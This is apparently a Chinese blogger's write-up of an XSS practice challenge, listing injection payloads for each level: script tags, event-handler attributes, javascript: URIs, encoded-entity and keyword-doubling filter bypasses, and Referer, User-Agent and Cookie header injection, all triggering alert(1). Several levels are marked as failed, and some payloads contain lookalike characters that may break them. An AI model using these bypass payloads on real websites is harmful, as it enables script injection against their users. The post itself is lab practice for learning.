前言
今日心血来潮,把前几个星期发现的XSS闯关拿来玩了一下,发现自己是真的菜。。不过看了一些大佬的博客,还是学到了一些JS的语法和xss的绕过姿势的!!!
大佬博客:
xss小游戏全通关-答案
test.ctf8 xss注入解题记录
Web安全测试学习笔记 - XSS靶场 - test.ctf8.com
解题payload:
level1:?name=<script>alert(1);</script>
level2:?keyword=" οnclick=“alert(1);&submit=搜索
level3:?keyword=’ οnfοcus='alert(1);&submit=搜索
level4:?keyword=” οnclick=“alert(1);&submit=搜索
level5:?keyword=”> <a href=javascript:alert(1);><"&submit=搜索
level6:?keyword=">+<Script>alert(1)%3B<%2Fscript> <&submit=搜索
level7:?keyword="><sscriptcript>alert(1)%3B<%2Fsscriptcript>’&submit=搜索
level8:
?keyword=%26%23x6A%3B%26%23x61%3B%26%23x76%3B%26%23x61%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%3Aalert(1)%3B&submit=添加友情链接
(javascript:alert(1);)
level9:
javascript:alert(1); //http://
javascript:http:// %0d alert(1);
level10:?keyword=well done!&t_sort=" type=“text” οnmοuseοver=“alert(1);”
level11:使用burpsuit来referer注入:referer: " type=“text” οnmοuseοver=“alert(1);”
level12:使用burpsuit来user-agent注入:user-agent: " type=“text” οnmοuseοver=“alert(1);”
level13:使用burpsuit来cookie注入:cookie: " type=“text” οnmοuseοver=“alert(1);”
level14:网站有问题
level15:同样有问题。。。
level16:?keyword=<img src=3 οnerrοr=alert(1);>测试不出来
level17:?arg01=a&arg02=b" οnclick=alert(1);或者= οnmοuseοver=alert(1);测试不出来
level18:?arg01=a&arg02=b" οnclick=alert(1);或者= οnmοuseοver=alert(1);测试不出来
level19:flash xss测试不出来
level20:flash xss 测试不出来
知识点
标签#
embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。
支持事件属性;
弹窗方式:
<embed src=level16.png οnmοuseοver=alert(1) width=100% heigth=100%>
<embed src=son.html οnmοuseοver=alert(1) width=100% heigth=100%>